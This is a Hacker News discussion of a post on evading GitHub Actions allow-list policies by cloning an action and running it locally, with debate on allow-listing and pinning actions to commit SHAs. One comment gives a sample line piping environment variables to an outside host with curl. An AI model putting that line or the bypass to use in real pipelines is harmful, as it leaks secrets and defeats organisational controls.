Bypassing GitHub Actions policies in the dumbest way possible

193 points by woodruffw | 93 comments | 6/11/2025, 2:15:54 PM | blog.yossarian.net ↗

Comments (93)

kj4ips · 19h ago
This is a prime example of "If you make an unusable secure system, the users will turn it into an insecure usable one."

If someone is actively subverting a control like this, it probably means that the control has morphed from a guardrail into a log across the tracks.

Somewhat in the same vein as AppLocker &co. Almost everyone says you should be using it, but almost no-one does, because it takes a massive amount of effort just to understand what "acceptable software" is across your entire org.

welshwelsh · 13h ago
Nobody outside of the IT security bubble thinks that using AppLocker is a sensible idea.

Companies have no business telling their employees which specific programs they can and cannot run to do their jobs, that's an absurd level of micromanagement.

neilv · 12h ago
> Companies have no business telling their employees which specific programs they can and cannot run to do their jobs, that's an absurd level of micromanagement.

I'm usually on the side of empowering workers, but I believe sometimes the companies do have business saying this.

One reason is that much of the software industry has become a batpoop-insane slimefest of privacy (IP) invasion, as well as grossly negligent security.

Another reason is that the company may be held liable for license terms of the software.

Another reason is that the company may be held liable for illegal behavior of the software (e.g., if the software violates some IP of another party).

Every piece of software might expose the company to these risks. And maybe disproportionately so, if software is being introduced by the "I'm gettin' it done!" employee, rather than by someone who sees vetting for the risks as part of their job.

janstice · 7h ago
For example, if someone installs the wrong version of Oracle Java on a VM in our farm, the licencing cost is seven figures as they want to charge per core that it could conceivably run on - this would be career-limiting for a number of people at once.
lelandbatey · 12h ago
Developers are going to write code to do things for them, such as small utility programs for automating work. Each custom program is a potentially brand new binary, never seen before by the security auditing software. Does every program written by every dev have to be cleared? Is it best in such a system to get an interpreter cleared so I can use that to run whatever scripts I need?
degamad · 10h ago
If I have an internal developer in such a scenario, then what makes most sense to me is to issue them a code-signing certificate or equivalent, whitelist anything signed by that certificate[1], and combine that with logging and periodic auditing to detect abuse.

[1] <https://learn.microsoft.com/en-us/windows/security/applicati...>

xmprt · 12h ago
This is a strawman argument. If a developer writes code that does something malicious then it's on the developer. If they install a program then the accountability is a bit fuzzier. It's partly on the developer, partly on security (for allowing an unprivileged user to do malicious/dangerous things even unknowingly), and partly on IT (for allowing the unauthorized program to run without any verification).
lelandbatey · 10h ago
It's not a straw man, I'm not trying to defuse liability. Of course a developer running malicious code they wrote is responsible for the outcomes.

I am pointing out that if every unique binary never before run/approved is blocked, then no developer will be able to build and then run the software they are paid to write, since them developing it modifies said software into a new and never before seen sequence of bits.

OP may not have meant to say that "it's good to have an absolute allowlist of executable signatures and block everything else", but that is how I interpreted the initial claim and I am merely pointing out that such a system would be more than inconvenient, it'd make the workflow of editing and then running software nearly impossible.

rainonmoon · 3h ago
It's a straw man in that you're establishing an inherently facile and ridiculous scenario just to knock it down. A scenario that, as others have demonstrated, is not grounded in any logical reality. "Nobody mentioned this imaginary horrible system I just thought of, but if they had, it sure would be terrible" is quite a hill to die on.
viraptor · 10h ago
> Does every program written by every dev have to be cleared?

No, that's not how things are implemented normally, exactly because they wouldn't work.

gabeio · 10h ago
> No, that's not how things are implemented normally, exactly because they wouldn't work.

I used to work for a gov't contractor. I wrote a ~10 line golang http server, just because at the time golang was still new (this was years ago) and I wanted to try it. Not even 2 minutes later I got a call from the IT team asking a bunch of questions about why I was running that program (the http server, not golang). I agree the practice is dumb but there are definitely companies who have it set up that way.

viraptor · 9h ago
So running it wasn't prevented for you, and new apps listening on the network trigger notifications that the IT checks on immediately. That sounds like a reasonable policy.
macintux · 9h ago
Around 1998 I snagged an abandoned 486 and installed Linux on it for use at work; the corporate software I used the most, a ticketing system, could be run using X from a Solaris server. I don't remember what I did for Lotus Notes.

Anyway, the IT department spotted it but since I was using SMB it thought it was just another Windows server. No one ever checked up on it despite being plugged into the corporate network.

This was a Fortune 500 company; things have changed a wee bit since then.

shanipribadi · 7h ago
Had something similar happen a few years back... basically the Go binaries I compiled and ran would get deleted every time I tried to run them. Usually just downloading the newer version of the Go compiler and recompiling with that solved it (I think it got flagged because it was compiled with an older version of the Go compiler with known vulnerabilities). Every time it happened I think IT security got a notification, because they would reach out to me afterwards. The few times upgrading to the latest Go version didn't work (false positives), I would just name the binary something like "Dude, wake up" or "dude, I need this to get whitelisted", and do the compile-run-binary_got_deleted cycle 10-20 times, effectively paging the IT security guy until they reached out and whitelisted things for me :-D
zmgsabst · 6h ago
Developers are generally given specific environments to run code, which aren’t their laptops — eg, VMs in a development environment.

The goal isn’t to stop a developer from doing something malicious, but to add a step to the chain for hackers to do something malicious: they need to pwn the developer laptop from the devbox before they can pivot to, eg, internal data systems.

nradov · 12h ago
That level of micromanagement can be quite sensible depending on the employee role. It's not needed for developers doing generic software work without any sensitive data. But if the employee is, let's say, a nurse doing medical chart review at an insurance company then there is absolutely no need for them to use anything other than specific approved programs. Allowing use of random software greatly increases the potential attack surface area, and in the worst case could result in something like a malware penetration and/or HIPAA privacy violation.
moooo99 · 2h ago
> Companies have no business telling their employees which specific programs they can and cannot run to do their jobs, that's an absurd level of micromanagement.

This is a lovely take if your business runs exclusively on FOSS, on-premise software, but it's a recipe for some hefty bills from software vendors due to people violating licensing conditions

bigfatkitten · 11h ago
Anyone who’s been sued by Oracle for not paying for Java SE runtime licences thinks it’s an outstanding idea.

https://itwire.com/guest-articles/guest-opinion/is-an-oracle...

Security practitioners are big fans of application whitelisting for a reason: Your malware problems pretty much go away if malware cannot execute in the first place.

The Australian Signals Directorate for example has recommended (and more recently, mandated) application whitelisting on government systems for the past 15 years or so, because it would’ve prevented the majority of intrusions they’ve investigated.

https://nsarchive.gwu.edu/sites/default/files/documents/5014...

viraptor · 10h ago
AppLocker is effectively an almost perfect solution to ransomware (on the employee desktops, anyway). You can plug lots of random holes all day long, or just whitelist what can be run in the first place. Ask M&S management today whether they would prefer to keep working with paper systems for another month, or to deal with AppLocker.
protocolture · 9h ago
>Companies have no business telling their employees which specific programs they can and cannot run to do their jobs, that's an absurd level of micromanagement.

Yet so many receptionists think that the application attached to the email sent by couriercompany@hotmail.com is a reasonable piece of software to run. Curious.

samplatt · 5h ago
False dichotomy. The manager of the receptionist, or the head of their department, can decide what's appropriate for their job and dictate this to IT, and then they can lock it down.

At my work currently IT have the first say and final say on all software, regardless of what it does or who is using it. It's an insane situation. Decisions are being made without any input from anyone even in the department of the users using the software... you know... the ones that actually make the company money...

davkan · 3h ago
No, it’s unreasonable for end users and non-technical managers to simply dictate to IT what software is to be installed on corporate devices. They can submit requests to IT with a business justification, which should be approved if it can be accommodated.

Maybe your employer’s IT department is in the habit of saying no without a proper attempt to accommodate, which can be a problem, but the solution is not to put the monkeys in charge of the zoo.

At my old job we had upper management demanding exceptions to office modern auth so they could use their preferred email apps. We denied that, there was no valid business justification that outweighed the security risk of bypassing MFA.

We then allowed a single exception to the policy for one of our devs as they were having issues with Outlook’s plaintext support when submitting patches to the LKML. Clear and obvious business justification without an alternative gets rubber stamped.

Security is a balance that can go too far in either direction. Your workstations probably don’t need to be air gapped, and susan from marketing probably shouldn’t be able to install grammarly.

solumos · 19h ago
The implied fix to the “unusable secure system” is forking the checkout action to your org and referencing it there.
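
Roughly like this, assuming the fork lives in a placeholder "my-org" organization (so an "allow actions created by this organization" policy covers it):

    # sketch of a workflow referencing the org's fork instead of upstream
    name: ci
    on: push
    jobs:
      build:
        runs-on: ubuntu-latest
        steps:
          # "my-org/checkout" is the org's fork of actions/checkout, pinned like any other action
          - uses: my-org/checkout@v4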
hiatus · 18h ago
That's not a fix though is it? Git tools are already on the runner. You could checkout code from public repos using cli, and you could hardcode a token into the workflow if you wanted to access a private repo (assuming the malicious internal user doesn't have admin privileges to add a secret).
monster_truck · 18h ago
Had these exact same thoughts while I was configuring a series of workflows and scripts to get around the multiple unjustified and longstanding restrictions on what things are allowed to happen when.

That sinking feeling when you search for how to do something and all of the top results are issues that were opened over a decade ago...

It is especially painful trying to use github to do anything useful at all after being spoiled by working exclusively from a locally hosted gitlab instance. I gave up on trying to get things to cache correctly after a few attempts of following their documentation, it's not like I'm paying for it.

Was also very surprised to see that the recommended/suggested default configuration that runs CodeQL had burned over 2600 minutes of actions in just a day of light use, nearly doubling the total I had from weeks of sustained heavy utilization. Who's paying for that??

saghm · 14h ago
It used 1.8 days of time to run for a single day? I'm less curious about who's paying for it than who's _using_ it on your repo, because I can't even imagine having an average of almost two people scanning a codebase every single minute of the day.
heelix · 12h ago
Not the OP, but a poorly behaving repo can turn and burn for six hours on every PR, rather than the handful of minutes one would expect. It happens - but usually that sort of thing should be spotted and fixed. More often than not, something is trying to pull artifacts and timing out rather than it being a giant monorepo.
Already__Taken · 14h ago
I'm baffled you can't clone internal/private repos with anything other than a developer PAT. They have a UI to share access for workflows, let cloning use that...
notpushkin · 6h ago
SSH also works, but I’d love to be able to just use git-credential-oauth [0] like for any other repo.

[0]: https://github.com/hickford/git-credential-oauth

throwaway52176 · 13h ago
I use GitHub apps for this, it’s cumbersome but works.
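
Roughly, using the official actions/create-github-app-token action to mint a short-lived installation token; the app ID variable, secret name, and repo names below are placeholders:

    name: clone-private-repo
    on: push
    jobs:
      build:
        runs-on: ubuntu-latest
        steps:
          # exchange the GitHub App credentials for an installation token
          - uses: actions/create-github-app-token@v1
            id: app-token
            with:
              app-id: ${{ vars.APP_ID }}
              private-key: ${{ secrets.APP_PRIVATE_KEY }}
              owner: my-org
              repositories: other-private-repo
          # use that token to check out the other private repository
          - uses: actions/checkout@v4
            with:
              repository: my-org/other-private-repo
              token: ${{ steps.app-token.outputs.token }}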
TheTaytay · 18h ago
I don’t understand the risk honestly.

Anyone who can write code to the repo can already do anything in GitHub actions. This security measure was never designed to mitigate against a developer doing something malicious. Whether they clone another action into the repo or write custom scripts themselves, I don’t see how GitHub’s measures could protect against that.

woodruffw · 18h ago
A mitigation for this exact policy mechanism is included in the post.

(The point is not directly malicious introductions: it's supply chain risk in the form of engineers introducing actions/reusable workflows that are themselves malleable/mutable/subject to risk. A policy that claims to do that should in fact do it, or explicitly document its limitations.)

hk1337 · 14h ago
I haven't tested this, but the main risk I can see is users creating PRs on public repositories with actions that run on pull request.
SchemaLoad · 9h ago
Companies that care about this kind of thing usually have the CI config on another repo from the actual code so you can't just rewrite it to deploy your dev branch straight to prod.
SamuelAdams · 11h ago
The risk is simple enough. GitHub Enterprise allows admins to configure a list of actions to allow or deny. Ideally these actions are published in the GitHub Marketplace.

The idea is that the organization does not trust these third-parties, therefore they disable their access.

However this solution bypasses those lists by cloning open-source actions directly into the runner. At that point it’s just running code, no different from if the maintainers wrote a complex action themselves.
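
A sketch of what that looks like (the clone path is illustrative; this is the same trick the post describes):

    name: policy-bypass-sketch
    on: push
    jobs:
      build:
        runs-on: ubuntu-latest
        steps:
          # fetch the action with plain git instead of `uses: actions/checkout@v4`,
          # which is the only form the allow/deny list inspects
          - run: git clone --depth 1 https://github.com/actions/checkout "$GITHUB_WORKSPACE/.checkout-clone"
          # then run it as a "local" action, which the policy doesn't evaluate
          - uses: ./.checkout-clone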

x0x0 · 14h ago
The risk is the same reason we don't allow any of our servers to make outgoing network connections except to a limited host lists. eg backend servers can talk to the gateway, queue / databases, and an approved list of domains for apis and nothing else.

The same guard helps prevent accidents, not just maliciousness, as well as security breaches. If code somehow gets onto our systems, but we prevent most outbound connections, exfiltrating is much harder.

Yes, people do code review but stuff slips through. See eg Google switching one of their core libs that did mkdir with a shell to run mkdir -p (tada! every invocation better understand shell escaping rules). That made it through code review. People are imperfect; telling your network no outbound connections (except for this small list) is much closer to perfect.

paulddraper · 7h ago
Well…you’re right.

The dumb thing is GitHub offers “action policies” pretending they actually do something.

hk1337 · 18h ago
This is why I avoid using non-official actions where possible and always set a version for the action.

We had a contractor that used some random action to ssh files to the server, and referenced master as the version to boot. First, ssh isn't that difficult to use for uploading files and running commands; second, the action owner could easily add code to send private keys and other information off to another server.

I am a bit confused on the "bypass" though. Wouldn't the adversary need push access to the repository to edit the workflow file? So, the portion that needs hardening is ensuring the wrong people do not have access to push files to the repository?

On public repositories I could see this being an issue if it's done in a section of the workflow that runs when a PR is created. With private repositories, you should take care about who you give access to.

gawa · 15h ago
> This is why I avoid using non-official actions where possible and always set a version for the action.

Those are good practices. I would add that pinning the version (tag) is not enough, as we learnt with the tj-actions/changed-files incident; we should pin the commit SHA [0]. GitHub states this in their official documentation [1] as well:

> Pin actions to a full length commit SHA

> Pin actions to a tag only if you trust the creator

[0] https://www.stepsecurity.io/blog/harden-runner-detection-tj-...

[1] https://docs.github.com/en/actions/security-for-github-actio...
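
In workflow terms (the pinned ref below is a placeholder, not a real actions/checkout commit):

    steps:
      # tag pin: the tag can be moved later to point at different (malicious) code
      - uses: actions/checkout@v4
      # full-length commit SHA pin: immutable; the trailing comment records the reviewed tag
      - uses: actions/checkout@<full-40-character-commit-sha>  # v4.x.y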

jand · 13h ago
> I am a bit confused on the "bypass" though. Wouldn't the adversary need push access to the repository to edit the workflow file? So, the portion that needs hardening is ensuring the wrong people do not have access to push files to the repository?

I understand it that way, too. But: Having company-wide policies in place (regarding actions) might be misunderstood/used as a security measure for the company against malicious/sloppy developers.

So documenting or highlighting the behaviour helps the devops guys avoid a false sense of security. Not much more.

OptionOfT · 14h ago
We forked the actions as a submodule, and then pointed the uses to that directory.

That way we were still tracking the individual commits which we approved as a team.

Now there is an interesting dichotomy. On one hand PMs want us to leverage GitHub Actions to build out stuff more quickly using pre-built blocks, but on the other hand security has no capacity or interest in whitelisting actions (not to mention that the whitelist is limited to 100 actions, as per the article).

That said, even pinning GitHub actions to a commit SHA isn't perfect for container actions, as they can refer to an image tag, and the contents of that tag can be changed: https://docs.github.com/en/actions/sharing-automations/creat...

E.g. I publish an action with code like

   runs:
     using: 'docker'
     image: 'docker://optionoft/actions-tool:v3.0.0'
You use the action, and pin it to the SHA of this commit.

I get hacked, and a hacker publishes a new version of optionoft/actions-tool:v3.0.0

You wouldn't even get a Dependabot update PR.
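
One partial fix (if the action author does it) is to reference the image by digest instead of a mutable tag; the digest below is a placeholder, and this assumes the runner accepts standard Docker digest references in `image:`:

    runs:
      using: 'docker'
      # a digest can't be repointed the way the v3.0.0 tag can
      image: 'docker://optionoft/actions-tool@sha256:<image-digest>'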

opello · 13h ago
Maybe there's a future Dependabot feature to create FYI issues when in-use tags change?
wereHamster · 11h ago
securityscorecard is easy to integrate (it's a CLI tool, or you can run it as a GitHub action); one of the checks it performs is "Pinned-Dependencies": https://github.com/ossf/scorecard/blob/main/docs/checks.md#p.... Checks that fail generate a security alert under Security -> Code scanning.
fkyoureadthedoc · 18h ago
This doesn't seem like a big deal to be honest.

My main problem with the policy and how it's implemented at my job is that the ones setting the policies aren't the ones impacted by them, and never consult people who are. Our security team tells our GitHub admin team that we can't use 3rd party actions.

Our GitHub admin team says sure, sounds good. They don't care, because they don't use actions, and in fact they don't deliver anything at all. The security team also delivers nothing, so they don't care. Combined, these teams' crowning achievement is buying GitHub Enterprise and moving it back and forth between cloud and on-prem 3 times in the last 7 years.

As a developer, I'll read the action I want to use, and if it looks good I just clone the code and upload it into our own org/repo. I'm already executing a million npm modules in the same context that do god knows what. If anyone complains, it's getting hit by the same static/dynamic analysis tools as the rest of the code and dependencies.

mook · 17h ago
It sounds like reading the code and forking it (therefore preventing malicious updates) totally satisfies the intent behind the policy, then.

My company has a similar whitelist of actions, with a list of third-party actions that were evaluated and rejected. A lot of the rejected stuff seems to be some sort of helper to make a release, which pretty much has a blanket suggestion to use the `gh` CLI already on the runners.
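
For example, a release step with the preinstalled `gh` CLI instead of a third-party release action might look roughly like this (tag pattern and artifact paths are illustrative):

    name: release
    on:
      push:
        tags: ['v*']
    jobs:
      release:
        runs-on: ubuntu-latest
        permissions:
          contents: write   # required to create releases
        steps:
          - uses: actions/checkout@v4
          # gh is preinstalled on GitHub-hosted runners and reads GH_TOKEN for auth
          - run: gh release create "$GITHUB_REF_NAME" dist/*.tar.gz --generate-notes
            env:
              GH_TOKEN: ${{ github.token }}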

bob1029 · 18h ago
I feel like GitHub's CI/CD offering is too "all-in" now. Once we are at a point where the SCM tool is a superset of AWS circa 2010, we probably need to step back and consider alternatives.

A more ideal approach could be to expose a simple rest API or webhook that allows for the repo owner to integrate external tooling that is better suited for the purpose of enforcing status checks.

I would much rather write CI/CD tooling in something like python or C# than screw around with yaml files and weird shared libraries of actions. You can achieve something approximating this right now, but you would have to do it by way of GH Actions to some extent.

PRs are hardly latency sensitive, so polling a REST API once every 60 seconds seems acceptable to me. This is essentially what we used to do with Jenkins, except we'd just poll the repo head instead of some weird API.

masklinn · 14h ago
> A more ideal approach could be to expose a simple rest API or webhook that allows for the repo owner to integrate external tooling that is better suited for the purpose of enforcing status checks.

That... has existed for years? https://docs.github.com/en/rest?apiVersion=2022-11-28

That was the only thing available before github actions. That was also the only thing available if you wanted to implement the not rocket science principle before merge queues.

It's hard to beat free tho, especially for OSS maintainership.

And GHA gives you concurrency for which you'd otherwise have to maintain an orchestrator (or a completely bespoke solution); just create multiple jobs or workflows.

And you don't need to deal with tokens to send statuses with. And you get all the logs and feedback in the git interface rather than having to BYO again. And you can actually have PRs marked as merged when you rebased or squashed them (a feature request which is now in middle school: https://github.com/isaacs/github/issues/2)

> PRs are hardly latency sensitive, so polling a REST API once every 60 seconds seems acceptable to me.

There is nothing to poll: https://docs.github.com/en/webhooks/types-of-webhooks
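
For instance, an external CI system reacting to a webhook can report back with one call to the commit status API (owner, repo, commit SHA, and token are placeholders):

    # https://docs.github.com/en/rest/commits/statuses
    curl -X POST \
      -H "Authorization: Bearer $GITHUB_TOKEN" \
      -H "Accept: application/vnd.github+json" \
      "https://api.github.com/repos/OWNER/REPO/statuses/COMMIT_SHA" \
      -d '{"state": "success", "context": "external-ci/build", "description": "build passed"}'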

korm · 17h ago
GitHub has both webhooks and an extensive API. What you are describing is entirely doable, nothing really requires GitHub Actions as far as I know.

Most people opt for it for convenience. There's a balance you can strike between all the yaml and shared actions, and running your own scripts.

sureglymop · 12h ago
I don't understand GitHub's popularity in the first place... You have git as the interoperable version control "protocol", but then slap proprietary issue, PR, CI and project management features on top that one can't bring along when migrating away? At that stage what is even the point of it being built on git? Also, for all that is great about git, I don't think it's the best version control system we could have at all. I wish we'd do some serious wheel reinventing here.
bob1029 · 10h ago
What do you think a more ideal VCS would look like?
clysm · 18h ago
I’m not seeing the security issue here. Arbitrary code execution leads to arbitrary code execution?

Seems like policies are impossible to enforce in general on what can be executed, so the only recourse is to limit secret access.

Is there a demonstration of this being able to access/steal secrets of some sort?

mystifyingpoi · 16h ago
> Seems like policies are impossible to enforce

The author addresses exactly that: "ineffective policy mechanisms are worse than missing policy mechanisms, because they provide all of the feeling of security through compliance while actually incentivizing malicious forms of compliance."

And I totally agree. It is so abundant. "Yes, we are in compliance with all the strong password requirements, strictly speaking there is one strong password for every single admin user for all services we use, but that's not in the checklist, right?"

dijksterhuis · 16h ago
It's less of an "use this to do nasty shit to a bunch of unsuspecting victims" one, and more of a "people can get around your policies when you actually need policies that limit your users".

1. BigEnterpriseOrg central IT dept click the tick boxes to disable outside actions because <INSERT SECURITY FRAMEWORK> compliance requires not using external actions [0]

2. BigBrainedDeveloper wants to use ExternalAction, so uses the method documented in the post because they have a big brain

3. BigEnterpriseOrg is no longer compliant with <INSERT SECURITY FRAMEWORK> and, more importantly, the central IT dept have zero idea this is happening without continuously inspecting all the CI workflows for every team they support and signing off on all code changes [1]

That's why someone else's point of "you're supposed to fork the action into your organisation" is a solution if disabling local `uses:` is added as an option in the tick boxes -- the central IT dept have visibility over what's being used and by whom if BigBrainedDeveloper can ask for ExternalAction to be forked into BigEnterpriseOrg GH organisation. Central IT dept's involvement is now just review the codebase, fork it, maintain updates.

NOTE: This is not a panacea against all things that go against <INSERT SECURITY FRAMEWORK> compliance (downloading external binaries etc). But it would be an easy gap getting closed.

----

[0]: or something, i dunno, plenty of reasons enterprise IT depts do stuff that frustrates internal developers

[1]: A sure-fire way to piss off every single one of your internal developers.

hiatus · 19h ago
That the policy can be "bypassed" by a code change doesn't seem so severe. If you are not reviewing changes to your CI/CD workflows all hope is lost. Your code could be exfiltrated, secrets stolen, and more.
woodruffw · 19h ago
The point of the post is that review is varied in practice: if you’re a large organization you should be reviewing the code itself for changes, but I suspect many orgs aren’t tracking every action (and every version of every action) introduced in CI/CD changes. That’s what policies are useful for, and why bypasses are potentially dangerous.

Or as an intuitive framing: if you can understand the value of branch protection and secret pushing policies for helping your junior engineers, the same holds for your CI/CD policies.

hiatus · 18h ago
The problem is not related to tracking every action or version in CI/CD changes. Right now, you can just curl a binary and run that. How is that any different from the exploit here? I guess people may have had a false sense of security if they had implemented those policies, but I would posit those people didn't really understand their CI/CD system if they thought those policies alone would prevent arbitrary code execution.
woodruffw · 18h ago
I think it's a difference in category; pulling random binaries from the Internet is obviously not good, but it's empirically mostly done in a pointwise manner. Actions on the other hand are pulled from a "marketplace", are subject to automatic bumps via things like Dependabot and Renovate, can be silently rewritten thanks to tag mutability, etc.

Clearly in an ideal world runners would be hermetic. But I think the presence of other sources of non-hermeticity doesn't justify a poorly implemented policy feature on GitHub's part.

solumos · 19h ago
“We only allow actions published by our organization and reusable workflows”

and

“We only allow actions published by our organization and reusable workflows OR ones that are manually downloaded from an outside source”

are very very different policies

hiatus · 18h ago
But there is no policy preventing external downloads in general, is there? I can curl a random script from a malicious website, too.
internobody · 19h ago
It's not simply a matter of review; depending on your setup these bypasses could be run before anyone even has eyes on the changes if your CI is triggered on push or on PR creation.
jadamson · 18h ago
`pull_request_target` (which has access to secrets) runs in the context of the destination branch, so any malicious workflow would need to have already been committed.

GitHub has a page on this:

https://securitylab.github.com/resources/github-actions-prev...
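
The footgun that page warns about is, roughly, a pull_request_target workflow that explicitly checks out the PR head, handing untrusted code a privileged context (a sketch, with an illustrative build script):

    name: risky
    # pull_request_target uses the base branch's workflow file and has secret access
    on: pull_request_target
    jobs:
      build:
        runs-on: ubuntu-latest
        steps:
          - uses: actions/checkout@v4
            with:
              # explicitly checking out the untrusted PR head defeats the protection
              ref: ${{ github.event.pull_request.head.sha }}
          # anything here now runs attacker-controlled code with access to secrets
          - run: ./ci/build.sh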

rawling · 18h ago
But similarly, couldn't you just write harmful stuff straight into the action itself?
mystifyingpoi · 16h ago
You definitely could, but it is more nuanced than that. You really don't want to be seen doing `env | curl -X POST http://myserver.cn` in a company repository. But using a legitimately-named action doesn't look too suspicious.
throwaway889900 · 19h ago
Not only can you yourself manually check out a specific repo, but if you have submodules and do a recursive checkout, it's also possible to pull in other security nightmares from places you never expected now. That would be one complicated attack to pull off though, chain of compromised workflows haha
ghusto · 19h ago
> world’s dumbest policy bypass: instead of doing uses: actions/checkout@v4, the user can git clone (or otherwise fetch) the actions/checkout repository into the runner’s filesystem, and then use uses: ./path/to/checkout to run the very same action

Good lord.

This is akin to saying "Instead of doing `apt-get install <PACKAGE>`, one can bypass the apt policies by downloading the package and running `dpkg -i <PACKAGE>`.

woodruffw · 18h ago
I think a salient difference is that apt policies apply to apt, whereas GitHub goes to some lengths to document GitHub Actions policies as applying to `uses:` clauses writ large.

(But also: in a structural sense, if a system did have `apt` policies that were intended to prevent dependency introduction, then such a system should prevent that kind of bypass. That doesn't mean that the bypass is life-or-death, but it's a matter of hygiene and misuse prevention.)

gawa · 16h ago
> which GitHub goes to extents to document GitHub Actions policies as applying to `uses:` clauses

If it were phrased like this then you would be right: the docs would give a false sense of security and would be misleading. So I went to check, but I didn't find such an assertion in the linked docs (please let me know if I missed it) [0]

So I agree with the commenter above (and GitHub) that "editing the GitHub action to add steps that download a script and run it" is not a fundamental flaw of a system designed to do exactly that: run commands as instructed by the user.

Overall we should always ask ourselves: what's the threat model here? If anyone can edit the GitHub Action, then we can make it do a lot of things, and this "GitHub Action Policy" filter toggle is the least of our worries. The only way to make the CI/CD pipeline secure (especially since the CD part usually has access to the outside world) is to prevent people from editing and running anything they want in it. In the case of GitHub Actions, that means restricting users' access to the repository itself.

[0] https://blog.yossarian.net/2025/06/11/github-actions-policie...

woodruffw · 15h ago
That's from here[1].

I suppose there's room for interpretation here, but I think an intuitive reading of "Allowing select actions and reusable workflows to run" is that the contrapositive ("actions and reusable workflows that are not allowed will not run") also holds. The trick in the post violates that contrapositive.

I think people are really getting caught up on the code execution part of this, which is not really the point. The point is that a policy needs to be encompassing to have its intended effect, which in the case of GitHub Actions is presumably to allow large organizations/companies to inventory their CI/CD dependencies and make globally consistent, auditable decisions about them.

Or in other words: the point here is similar to the reason companies run their own private NPM, PyPI, etc. indices -- the point is not to stop the junior engineers from inserting shoddy dependencies, but to know when they do so that remediation becomes a matter of policy, not "find everywhere we depend on this component." Bypassing that policy means that the worst of both worlds happens: you have the shoddy dependency and the policy-view of the world doesn't believe you do.

[1]: https://docs.github.com/en/repositories/managing-your-reposi...

qbane · 18h ago
Also, you can leak any secrets by making connections to external services over the internet and simply sending the secrets to them.
mystifyingpoi · 16h ago
You can also print them to console in quadruple base64 in reverse, the trick is getting away with it.
formerly_proven · 17h ago
Not in many enterprisey CI systems you can't, those frequently have hermetic build environments.
msgodel · 16h ago
Nothing makes me want to quit software more than enterprisey CI systems.
qbane · 16h ago
I think GitHub is correct that the bypass itself is not a vulnerability, but, just like with the little tooltip on GitHub's "create secret gist" button, GitHub could do a better job of clarifying this in the "Actions permissions" section.
john-h-k · 13h ago
There is no meaningful way to get around this. Ban them in `uses:` keys? Fine, they just put it in a bash script and run that. Etc etc. If it allows running arbitrary code, this will always exist
0xbadcafebee · 12h ago
You call it a security issue. I call it my only recourse when the god damn tyrannical GitHub Org admins lock it down so hard I can't do my job.

(yes it is a security issue (as it defeats a security policy) but I hope it remains unfixed because it's a stupid policy)

chelmzy · 17h ago
Does anyone know how to query what actions have been imported from the Actions Marketplace (or anywhere) in Github enterprise? I've been lazily looking into this for a bit and can't find a straight answer.
jamesblonde · 12h ago
Run data integration pipelines with Github actions -

https://dlthub.com/docs/walkthroughs/deploy-a-pipeline/deplo...

It's the easiest way for many startups to get people to try out your software for free.

solatic · 15h ago
If your Security folk are trying to draw up a wall around the enterprise (prevent using stuff not intentionally mirrored in) but there are no network controls - no IP address based firewalls, no DNS firewalls, no Layer 7 firewalls (like AWS VPC Endpoint Policy or GCP VPC Service Controls) governing access to object storage and the like.... Quite frankly, the implementation is either immature or incompetent.

If you work for an org with restrictive policy but not restrictive network controls, anyone at work could stand up a $5 VPS and break the network control. Or a Raspberry Pi at home and DynDNS. Or a million others.

Don't be stupid and think that a single security control means you don't need to do defense in depth.

bluelightning2k · 10h ago
I don't think this is a security flaw.

That's like saying it's a security flaw in the Chrome store that you could enable dev mode, copy the malware and run it that way.

zingababba · 13h ago
Copilot repository exclusions is another funny control from GitHub. It gets the local repo context from the .git/config remote origin URL. Just comment that out and you can use copilot on an 'excluded' repo. Remove the comment to push your changes. Very much a paper control.
lmm · 19h ago
Meh. Arbitrary code execution allows you to execute arbitrary code. If you curl | sh something in your github action script then that will "bypass the policy" too.


gchamonlive · 13h ago
I'm inclined to add https://github.com/marketplace/actions/sync-to-gitlab to all my repos in github, so that I can tap into the social value of GitHub's community and the technical value of GitLab's everything else.
dijksterhuis · 9h ago
Simpler version from GitLab (no actions needed) https://docs.gitlab.com/user/project/repository/mirror/push/

I was planning to do this myself. GitLab for dev work proper. GitHub push mirror on `main` for gen-pop access (releases/user issue reporting).